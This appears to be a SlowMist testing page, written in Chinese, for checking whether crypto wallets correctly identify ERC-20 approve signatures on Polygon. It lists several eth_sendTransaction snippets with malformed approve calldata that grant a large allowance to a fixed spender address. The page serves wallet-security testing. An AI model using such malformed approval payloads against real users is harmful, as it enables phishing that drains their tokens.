PoCs Check

测试指南
EN

Approve Signature 测试指南

概要说明

approve 允许代币持有人批准另一个地址能够从其账户中转移指定数量的代币。这种操作通常用于允许交易或合约在用户账户中花费代币。

如果钱包未能正确识别 Dapp 发起的 approve 签名数据异常,可能会导致钓鱼风险。

漏洞定位

击页面上的“Connect Wallet”按钮连接钱包。本测试适用于 Polygon 网络。如果连接钱包后下面的空白框未显示“Polygon Mainnet (Chain ID: 137)”,请点击“Switch to Polygon Mainnet”按钮切换网络。

分别点击下面的“approve(address,uint256) 128”等按钮进行测试,其中 128 表示正常长度,而“126”、“126+Blank”等均为非正常长度。如果钱包在唤起签名后未能正确识别签名类型或识别出风险,则存在漏洞。

修复方式

建议钱包正确识别不同签名数据长度的 approve 签名类型。

ethereum.request({
            "method": "eth_sendTransaction",
            "params": [{
                "from": accounts[0],
                "to": "0xc2132d05d31c914a87c6611c10748aeb04b58e8f",
                "gasPrice": "0x09184e72a000",
                "gas": "0xe4f3",
                "data": "0x095ea7b30000000000000000000000009197ee309722a7658934796f0c4bfde85774dd2800000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
            }]
        });
approve(address,uint256) is: 0x095ea7b3

        

    


    

    

        
ethereum.request({
            "method": "eth_sendTransaction",
            "params": [{
                "from": accounts[0],
                "to": "0xc2132d05d31c914a87c6611c10748aeb04b58e8f",
                "gasPrice": "0x09184e72a000",
                "gas": "0xe4f3",
                "data": "0x095ea7b30000000000000000000000009197ee309722a7658934796f0c4bfde85774dd2800000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
            }]
        });

    


    

        
approve(address,uint256) is: 0x095ea7b3

        

        

    


    
    

        
ethereum.request({
            "method": "eth_sendTransaction",
            "params": [{
                "from": accounts[0],
                "to": "0xc2132d05d31c914a87c6611c10748aeb04b58e8f",
                "gasPrice": "0x09184e72a000",
                "gas": "0xe4f3",
                "data": "0x095ea7b30000000000000000000000009197ee309722a7658934796f0c4bfde85774dd2800000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 112233445566"
            }]
        });

    


    

        
approve(address,uint256) is: 0x095ea7b3

        

        

    


    

    

        
ethereum.request({
            "method": "eth_sendTransaction",
            "params": [{
                "from": accounts[0],
                "to": "0xc2132d05d31c914a87c6611c10748aeb04b58e8f",
                "gasPrice": "0x09184e72a000",
                "gas": "0xe4f3",
                "data": "0x095ea7b30000000000000000000000009197ee309722a7658934796f0c4bfde85774dd2800000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF00"
            }]
        });

    


    

        
approve(address,uint256) is: 0x095ea7b3

        

        

    

    
    

        
ethereum.request({
            "method": "eth_sendTransaction",
            "params": [{
                "from": accounts[0],
                "to": "0xc2132d05d31c914a87c6611c10748aeb04b58e8f",
                "gasPrice": "0x09184e72a000",
                "gas": "0xe4f3",
                "data": "0x095ea7b30000000000000000000000009197ee309722a7658934796f0c4bfde85774dd2800000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
            }]
        });

    


    

        
approve(address,uint256) is: 0x095ea7b3

        

        

    

    
    

        
ethereum.request({
            "method": "eth_sendTransaction",
            "params": [{
                "from": accounts[0],
                "to": "0xc2132d05d31c914a87c6611c10748aeb04b58e8f",
                "gasPrice": "0x09184e72a000",
                "gas": "0xe4f3",
                "data": "0x095ea7b30000000000000000000000009197ee309722a7658934796f0c4bfde85774dd2800000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
            }]
        });

    


    

        
approve(address,uint256) is: 0x095ea7b3

        

        

    


    

        
Copyright © SlowMist All Rights Reserved.